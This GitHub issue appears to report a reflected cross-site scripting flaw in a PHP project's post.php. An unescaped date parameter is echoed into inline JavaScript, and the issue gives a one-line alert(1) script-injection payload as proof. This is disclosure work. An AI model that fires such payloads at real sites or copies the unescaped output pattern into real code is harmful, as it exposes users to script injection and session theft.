Skip to content

Found an xss vulnerability in the date parameter of the post.php file #47

@chasingboy

Description

@chasingboy

1、Download source code audit,It was found that the date parameter in the post.php file was not filtered during output.

# line 245
function goto_page(e)
{
  var evt = e || window.event;
  var eventSrc = evt.target||evt.srcElement;

  if ((e.keyCode || e.which) == 13) {
    location.href = '?state=<?php echo $state; ?>&date=<?php echo $filter_date;?>&tag=<?php echo urlencode($filter_tag); ?>&page=' + eventSrc.value;
  }
}
image image

2、payload and recurrence vulnerability

1111'</script><script>alert(1);</script>
image

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions